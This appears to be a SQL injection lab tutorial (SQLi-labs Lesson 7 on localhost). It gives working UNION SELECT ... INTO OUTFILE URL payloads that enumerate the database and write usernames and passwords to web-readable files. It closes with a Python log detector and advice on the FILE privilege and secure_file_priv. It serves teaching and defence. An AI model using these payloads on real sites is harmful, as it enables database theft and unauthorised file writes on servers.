Dumping Database using Outfile

In our previous article you learned the basic concepts of SQL injection, but in some scenarios you will find that basic knowledge and tricks fail. Today we are going to work with the SELECT ... INTO OUTFILE statement, which is the easiest way of exporting a table's records into a text file or an Excel file.

This statement allows a user to dump table data very rapidly into a text file on the server machine. SELECT ... INTO OUTFILE writes the selected rows to a file and lets you use column and row terminators to specify the output format. The output file is created directly by the MySQL server, so the filename with its path must specify where the user wants the file to be written on the server host. The file must not already exist on the server; it cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!
Lesson 7

Open the browser and type following SQL query in URL
http://localhost:81/sqli/Less-7/?id=1

From the screenshot you can read "You are in... Use outfile". Now let's try to break this statement.


OKAY! The query has been broken successfully: we receive an error message when we use a single quote (') to break the query, which confirms that it is vulnerable.


After a lot of effort the query finally gets fixed. If you noticed, the steps for SQL injection are the same as in the previous chapter; only the technique used to fix the query is different (here the injected value is closed with ')) as in the queries below).


Now the following query will dump the result into a text file. Here you need to give the path where the file should be written on the server host. The file must not already exist on the server, so a new text file name is used each time database information is written out.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+

From the screenshot you can see that the page still shows an error message. Now open another tab to view the output of the resulting query.


Now append the file name hack1.txt to the URL to check the output of the above query.


Hence you can see that we get the output of the executed query inside the text file. This also saves the hack1.txt file on the server machine.


Execute the following query to retrieve the database name using union injection, writing to a new text file.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+


Hence you can see we have successfully got "security" as the database name.


The next query will provide all the table names stored inside the database, using another text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+


From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users


Now we'll try to find out the column names of the users table using the following query.
localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+


Hence you can see it contains many columns; I chose only two of them for further enumeration.
C1: username
C2: password


At last, execute the following query to read all usernames and passwords inside the users table from its columns.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password)from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+


From the screenshot you can read the usernames and passwords saved inside the text file.
Note: you can try the same attack using an Excel file; the attacker only needs to change hack1.txt to hack1.csv, which will save the output as a CSV file that opens in Excel.
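Every request in this walkthrough travels through the web server log, so the technique is easy to spot after the fact. The following detector is an added example, not code from the original post: it parses constructed Apache-style access-log lines (built from the URLs shown above plus a benign request), URL-decodes each request and flags any that carry a UNION SELECT followed by INTO OUTFILE/DUMPFILE, reporting the target path the attacker asked MySQL to write.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post); the
# request URLs are the ones used in this walkthrough plus one benign hit.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2023:12:00:01 +0000] "GET /sqli/Less-7/?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [10/Oct/2023:12:00:05 +0000] "GET /sqli/Less-7/?id=1'))%20union%20select%201,2,3%20into%20outfile%20%22/xampp/htdocs/sqli/Less-7/hack1.txt%22%20--+ HTTP/1.1" 500 310
127.0.0.1 - - [10/Oct/2023:12:00:09 +0000] "GET /sqli/Less-7/?id=1'))%20union%20select%201,group_concat(username),group_concat(password)from%20users%20into%20outfile%20%22/xampp/htdocs/sqli/Less-7/hack5.txt%22%20--+ HTTP/1.1" 500 310
"""

# Request line of a combined/common log entry: method, URL, protocol.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# The two halves of the technique on this page: a UNION append and a
# server-side file write.  Whitespace is normalised before matching so
# tab/newline variants are caught as well.
UNION_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)
OUTFILE_RE = re.compile(r'\binto\s+(?:out|dump)file\s*(["\'])(.+?)\1', re.I)


def find_outfile_injections(log_text):
    """Return (line_no, path_written, decoded_url) for every request that
    combines UNION SELECT with INTO OUTFILE / INTO DUMPFILE."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # Decode twice so %2520-style double encoding does not evade the match.
        url = unquote_plus(unquote_plus(m.group(1)))
        flat = re.sub(r'\s+', ' ', url)
        if UNION_RE.search(flat):
            f = OUTFILE_RE.search(flat)
            if f:
                hits.append((n, f.group(2), flat))
    return hits


if __name__ == "__main__":
    for line_no, path, url in find_outfile_injections(SAMPLE_LOG):
        print(f"line {line_no}: file write to {path}\n  {url}")
```

On the server side the writes only succeed because the MySQL account holds the FILE privilege and the secure_file_priv setting does not confine writes to a safe directory; both are worth checking alongside the log review.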
